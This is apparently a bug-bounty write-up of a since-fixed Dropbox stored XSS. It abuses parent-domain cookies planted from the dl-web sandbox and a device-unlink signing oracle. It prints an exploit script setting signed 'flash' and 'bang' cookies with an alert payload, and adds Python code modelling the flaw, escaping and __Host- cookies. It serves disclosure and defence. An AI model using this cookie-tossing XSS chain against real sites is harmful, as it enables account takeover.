I think many people already know that we can execute arbitrary JavaScript, without any filtering, simply by uploading an HTML file to Dropbox. However, the uploaded script runs on a sandboxed domain, dl-web.dropbox.com, so we cannot easily steal another user's session.

What I want to point out here is that, even though we cannot directly access the cookies of the main subdomain (www.dropbox.com), we can set any cookie for the parent domain (.dropbox.com), because the sandboxed domain is also under it. So I thought it might be possible to make something happen on www.dropbox.com through dl-web.dropbox.com.

Vulnerability

I found a nice feature, Flash. It is a pop-up message that appears for 1-2 seconds and is triggered by cookies. When the cookies "flash" and "bang" are present, it draws a small message box containing the text stored in the "flash" cookie, after checking the integrity of "flash" against the "bang" cookie. "bang" seems to be an HMAC of "flash". So I needed to find a correct "bang" value for my custom "flash".

I also found another function, which unlinks a device on the security settings page. When I unlink a device, it shows me a flash message that contains the unlinked device's name. So if I set the device name to any JavaScript code and unlink it, it generates correct "flash" and "bang" values for the injected script.

Exploit

Now I can make a flash message with any text.

After uploading an HTML file that sets the malicious cookies obtained from the device unlink function, make the victim open your page. The flash message will appear and attack the victim when the victim opens a Dropbox web page.

<script>
// Plant the signed pair obtained from the device-unlink flash for the parent domain
document.cookie="bang=QUFEZGthYS1CaTNfWUpYcDUwdjNxemVHSHlhSHJkU3BEdnhKRUxOZVZ3b2ZoUQ%3D%3D; Domain=dropbox.com; Path=/;";
document.cookie="flash=b2s6PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmRvbWFpbik%2BIHVubGlua2VkIHN1Y2Nlc3NmdWxseS4%3D; Domain=dropbox.com; Path=/";
// Send the victim to a main-site page, where the flash message is rendered
location.href="https://dropbox.com/forgot";
</script>

There is a CSP, but the script can still be executed on IE or Safari.
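The pattern behind the bug, as an added Python example that is not Dropbox's code: a signed "flash" cookie (the page's flash value base64-decodes to "ok:" followed by the message text) is verified and then rendered, with the device-unlink action acting as a signing oracle for attacker-chosen text. The key, the HMAC-SHA256 construction and the cookie encoding are assumptions; the fix shown is output escaping, with a __Host- cookie prefix as a further mitigation against cookies planted from a subdomain.

```python
import base64
import hashlib
import hmac
import html
from typing import Optional

# Constructed key for the example; the real server key and MAC algorithm are unknown.
SERVER_KEY = b"constructed-example-key"

def mac_for(flash: str, key: bytes) -> str:
    """'bang' value assumed here: base64 of HMAC-SHA256 over the 'flash' cookie value."""
    digest = hmac.new(key, flash.encode(), hashlib.sha256).digest()
    return base64.b64encode(digest).decode()

def sign_flash(message: str, key: bytes = SERVER_KEY) -> tuple[str, str]:
    """Server side: build the 'flash' cookie ("ok:" + text, base64) and its 'bang' MAC."""
    flash = base64.b64encode(("ok:" + message).encode()).decode()
    return flash, mac_for(flash, key)

def verify_flash(flash: str, bang: str, key: bytes = SERVER_KEY) -> Optional[str]:
    """Return the message text if 'bang' is a valid MAC over 'flash', otherwise None."""
    if not hmac.compare_digest(mac_for(flash, key), bang):
        return None
    decoded = base64.b64decode(flash).decode()
    return decoded[3:] if decoded.startswith("ok:") else None

def unlink_device(device_name: str) -> tuple[str, str]:
    """The signing oracle: the flash text embeds a user-chosen device name, so the
    MAC proves only that the server produced it, not that the text is safe to render."""
    return sign_flash(f"{device_name} unlinked successfully.")

def render_flash_vulnerable(flash: str, bang: str) -> str:
    """MAC check passes, then the text goes into the page unescaped: stored XSS."""
    msg = verify_flash(flash, bang)
    return "" if msg is None else f"<div class=\"flash\">{msg}</div>"

def render_flash_fixed(flash: str, bang: str) -> str:
    """Same check, but the text is HTML-escaped before it reaches the DOM."""
    msg = verify_flash(flash, bang)
    return "" if msg is None else f"<div class=\"flash\">{html.escape(msg)}</div>"

def host_cookie(name: str, value: str) -> str:
    """Second layer: a __Host- cookie is only accepted with Secure, Path=/ and no Domain
    attribute, so a sandbox subdomain cannot plant it for the parent site."""
    return f"__Host-{name}={value}; Secure; Path=/; HttpOnly; SameSite=Lax"
```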

2015/05/02: Fixed, with a bounty of $1,331.